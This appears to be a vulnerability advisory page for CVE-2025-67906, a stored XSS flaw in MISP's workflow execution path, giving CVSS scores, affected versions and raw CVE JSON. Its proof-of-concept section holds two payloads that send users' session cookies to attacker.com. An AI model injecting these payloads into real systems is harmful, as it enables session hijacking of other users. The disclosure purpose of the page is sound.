Security Vulnerability Report
中文
CVE-2025-67906 CVSS 5.4 MEDIUM

CVE-2025-67906

Published: 2025-12-15 04:15:37
Last Modified: 2025-12-21 01:15:51

Description

In MISP before 2.5.28, app/View/Elements/Workflows/executionPath.ctp allows XSS in the workflow execution path.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:* - VULNERABLE
MISP < 2.5.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-67906 PoC - Stored XSS in MISP Workflow executionPath // This PoC demonstrates the XSS vulnerability in MISP before 2.5.28 // Target: MISP instance < 2.5.28 // Step 1: Create a malicious workflow with XSS payload const payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Step 2: Inject payload into workflow execution path field // The payload will be stored and executed when viewed by other users // Alternative payload using event handler: const altPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">'; // Attack flow: // 1. Attacker with low privileges creates/edits workflow // 2. In execution path field, inject malicious JavaScript // 3. When other users view the workflow, XSS executes in their browser // 4. Attacker steals session cookies or performs actions on behalf of victim

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67906", "sourceIdentifier": "[email protected]", "published": "2025-12-15T04:15:37.110", "lastModified": "2025-12-21T01:15:51.290", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In MISP before 2.5.28, app/View/Elements/Workflows/executionPath.ctp allows XSS in the workflow execution path."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:misp:misp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.28", "matchCriteriaId": "ACB6D91F-B9D2-4400-B39C-8498FDF6F44A"}]}]}], "references": [{"url": "https://github.com/MISP/MISP/commit/1f39deb572da7ecb5855e30ff3cc8cbcaa0c1054", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MISP/MISP/compare/v2.5.27...v2.5.28", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/franckferman/CVE-2025-67906", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/franckferman/GCVE-1-2025-0030", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://vulnerability.circl.lu/vuln/gcve-1-2025-0031", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/franckferman/CVE-2025-67906", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}